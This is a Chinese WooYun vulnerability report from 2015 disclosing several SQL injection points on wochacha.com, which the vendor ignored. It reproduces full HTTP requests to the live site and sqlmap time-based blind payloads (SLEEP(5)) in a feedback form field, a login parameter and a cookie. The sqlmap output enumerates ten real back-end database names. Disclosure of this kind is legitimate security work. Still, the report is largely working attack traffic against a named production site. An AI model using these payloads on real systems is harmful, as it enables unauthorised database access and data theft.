当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131304

漏洞标题:我查查多处SQL注入打包提交(涉及至少10个库)

相关厂商:wochacha.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-08-04 10:51

修复时间:2015-08-09 10:52

公开时间:2015-08-09 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1

详细说明:

1.
POST数据包:

POST /about/bugbacksave HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 1242
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NGEUERKTBF
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_QUNRCSDYVU
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="item"
4
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_brand"
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_type"
987-65-4329
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="project_type"
0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="quest"
1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="question_type"
0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="system_version"
1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_email"
###############email######
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_qq"
###############QQ
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_tel"
##########################?
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="wochacha_version"
1
-------AcunetixBoundary_QUNRCSDYVU--


0.png


1.png


跑了下 security 库 太慢了 剩下的数据以及库就不跑了

2.png


(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection points with a total of 99 HTTP(s) requ
ests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="item"
4
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_brand"
if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))RjDc) AND
'bhHH'='bhHH'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep
(0),0))OR"/
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="mobile_type"
987-65-4329
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="project_type"
0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="quest"
1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="question_type"
0
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="system_version"
1
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_email"
###############email######
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_qq"
###############QQ
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="user_tel"
##########################?
-------AcunetixBoundary_QUNRCSDYVU
Content-Disposition: form-data; name="wochacha_version"
1
-------AcunetixBoundary_QUNRCSDYVU--
---
[14:37:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:37:45] [INFO] fetching database names
[14:37:45] [INFO] fetching number of databases
[14:37:45] [INFO] retrieved:
[14:37:45] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
10
[14:38:06] [INFO] retrieved: information_schema
[14:45:11] [INFO] retrieved: gcore
[14:47:23] [INFO] retrieved: gcoreinc
[14:50:27] [INFO] retrieved: mysql
[14:52:37] [INFO] retrieved: security
[14:55:45] [INFO] retrieved: test
[14:57:28] [INFO] retrieved: thir
[14:59:46] [ERROR] invalid character detected. retrying..
[14:59:46] [WARNING] increasing time delay to 6 seconds
[15:00:31] [ERROR] invalid character detected. retrying..
[15:00:31] [WARNING] increasing time delay to 7 seconds
da
[15:01:54] [ERROR] invalid character detected. retrying..
[15:01:54] [WARNING] increasing time delay to 8 seconds
pp
[15:04:17] [INFO] retrieved: trap
[15:06:56] [INFO] retrieved: wcc
[15:08:40] [INFO] retrieved: zabbix
available databases [10]:
[*] gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] security
[*] test
[*] thirdapp
[*] trap
[*] wcc
[*] zabbix
[15:12:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.wochacha.com'
[*] shutting down at 15:12:12


漏洞证明:

2.POST数据包:

POST /login_register.html HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Content-Length: 230
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
mobilephone=&password=g00dPa%24%24w0rD&repassword=g00dPa%24%24w0rD&validateword=01/01/1967&yan=1


0.png


1.png


剩下的就不跑了

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection points with a total of 98 HTTP(s) requ
ests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mobilephone=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SE
LECT(SLEEP(5)))Jzru) AND 'Xbzt'='Xbzt'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR
(if(now()=sysdate(),sleep(0),0))OR"/&password=g00dPa$$w0rD&repassword=g00dPa$$w0
rD&validateword=01/01/1967&yan=1
---
[14:38:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:38:19] [INFO] fetching database names
[14:38:19] [INFO] fetching number of databases
[14:38:19] [INFO] retrieved:
[14:38:19] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
1
[14:38:41] [ERROR] invalid character detected. retrying..
0
[14:38:54] [INFO] retrieved: information_schema
[14:46:10] [INFO] retrieved: gcore
[14:48:19] [INFO] retrieved:
[14:48:41] [ERROR] invalid character detected. retrying..
gcoreinc
[14:51:43] [INFO] retrieved: mysql
[14:53:58] [ERROR] invalid character detected. retrying..
[14:54:01] [INFO] retrieved: securi
[14:56:36] [ERROR] invalid character detected. retrying..
ty
[14:57:50] [ERROR] invalid character detected. retrying..
[14:57:53] [INFO] retrieved: tes
[14:59:46] [ERROR] invalid character detected. retrying..
t
[15:00:33] [INFO] retrieved: th
[15:02:07] [ERROR] invalid character detected. retrying..
[15:02:58] [ERROR] invalid character detected. retrying..
irdapp
[15:05:48] [INFO] retrieved: trap
[15:07:33] [INFO] retrieved: wcc
[15:08:57] [ERROR] invalid character detected. retrying..
[15:09:09] [ERROR] invalid character detected. retrying..
[15:09:12] [INFO] retrieved: zabb
[15:11:01] [ERROR] invalid character detected. retrying..
ix
[15:12:08] [ERROR] invalid character detected. retrying..
available databases [10]:
[*] gcore
[*] gcoreinc
[*] information_schema
[*] mysql
[*] security
[*] test
[*] thirdapp
[*] trap
[*] wcc
[*] zabbix
[15:12:11] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.wochacha.com'
[*] shutting down at 15:12:11


3.cookie注入 很多处这里我就列举一处 其他处自查

GET /login/ HTTP/1.1
Cookie: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6%B5%B7%E5%B8%82; username=
X-Requested-With: XMLHttpRequest
Referer: http://www.wochacha.com:80/
Host: www.wochacha.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


多参数可注入

0.png


1.png


(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 361 HTTP(s) req
uests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: wccid=030f41d14af28040995e77eb3abeb138; ctid=1; ctname=%E4%B8%8A%E6
%B5%B7%E5%B8%82; username=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (S
ELECT(SLEEP(5)))swAQ) AND 'tKym'='tKym'XOR(if(now()=sysdate(),sleep(0),0))OR'"XO
R(if(now()=sysdate(),sleep(0),0))OR"/
---
[14:43:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[14:43:32] [INFO] fetching database names
[14:43:32] [INFO] fetching number of databases
[14:43:32] [INFO] retrieved:
[14:43:32] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[14:44:02] [INFO] adjusting time delay to 4 seconds due to good response times
[14:44:07] [ERROR] invalid character detected. retrying..
[14:44:07] [WARNING] increasing time delay to 5 seconds
10
[14:44:26] [INFO] retrieved: informat
[14:48:03] [ERROR] invalid character detected. retrying..
[14:48:03] [WARNING] increasing time delay to 6 seconds
[14:48:34] [ERROR] invalid character detected. retrying..
[14:48:34] [WARNING] increasing time delay to 7 seconds
io
[14:50:03] [ERROR] invalid character detected. retrying..
[14:50:03] [WARNING] increasing time delay to 8 seconds
n
[14:51:42] [ERROR] invalid character detected. retrying..
[14:51:42] [WARNING] increasing time delay to 9 seconds
_sc
[14:54:28] [ERROR] unable to properly validate last character value ('y')..
yema
[14:55:25] [ERROR] invalid character detected. retrying..
[14:55:25] [WARNING] increasing time delay to 5 seconds
[14:55:28] [INFO] retrieved: g
[14:56:13] [ERROR] invalid character detected. retrying..
[14:56:13] [WARNING] increasing time delay to 6 seconds
core
[14:58:24] [ERROR] invalid character detected. retrying..
[14:58:24] [WARNING] increasing time delay to 7 seconds
[14:58:27] [INFO] retrieved: gc
[15:00:26] [ERROR] invalid character detected. retrying..
[15:00:26] [WARNING] increasing time delay to 8 seconds
o
[15:02:07] [ERROR] invalid character detected. retrying..
[15:02:07] [WARNING] increasing time delay to 9 seconds
rein
[15:05:36] [ERROR] unable to properly validate last character value ('q')..
q
[15:05:38] [INFO] retrieved: my
[15:06:54] [ERROR] invalid character detected. retrying..
[15:06:54] [WARNING] increasing time delay to 5 seconds
sql
[15:08:27] [ERROR] invalid character detected. retrying..
[15:08:27] [WARNING] increasing time delay to 6 seconds
[15:08:30] [INFO] retrieved: secur
[15:10:57] [ERROR] invalid character detected. retrying..
[15:10:57] [WARNING] increasing time delay to 7 seconds
[15:11:32] [ERROR] invalid character detected. retrying..
[15:11:32] [WARNING] increasing time delay to 8 seconds
it
[15:13:48] [ERROR] invalid character detected. retrying..
[15:13:48] [WARNING] increasing time delay to 9 seconds
y
[15:14:29] [INFO] retrieved: t
[15:16:09] [ERROR] unable to properly validate last character value ('i')..
is
[15:17:14] [ERROR] invalid character detected. retrying..
[15:17:14] [WARNING] increasing time delay to 5 seconds
t
[15:18:14] [ERROR] invalid character detected. retrying..
[15:18:14] [WARNING] increasing time delay to 6 seconds
[15:18:40] [ERROR] invalid character detected. retrying..
[15:18:40] [WARNING] increasing time delay to 7 seconds
[15:19:03] [ERROR] invalid character detected. retrying..
[15:19:03] [WARNING] increasing time delay to 8 seconds
[15:19:24] [ERROR] invalid character detected. retrying..
[15:19:24] [WARNING] increasing time delay to 9 seconds
[15:19:44] [ERROR] unable to properly validate last character value ('A')..
A
[15:19:55] [ERROR] invalid character detected. retrying..
[15:19:55] [WARNING] increasing time delay to 5 seconds
[15:20:27] [ERROR] invalid character detected. retrying..
[15:20:27] [WARNING] increasing time delay to 6 seconds
[15:20:52] [ERROR] invalid character detected. retrying..
[15:20:52] [WARNING] increasing time delay to 7 seconds
[15:20:56] [INFO] retrieved:
[15:21:32] [ERROR] invalid character detected. retrying..
[15:21:32] [WARNING] increasing time delay to 8 seconds
third
[15:25:11] [ERROR] invalid character detected. retrying..
[15:25:11] [WARNING] increasing time delay to 9 seconds
app
[15:27:40] [INFO] retrieved: tr
[15:29:40] [ERROR] unable to properly validate last character value ('a')..
ap
[15:30:10] [INFO] retrieved: wcc
[15:31:23] [INFO] retrieved: z
[15:32:03] [ERROR] invalid character detected. retrying..
[15:32:03] [WARNING] increasing time delay to 5 seconds


修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-09 10:52

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无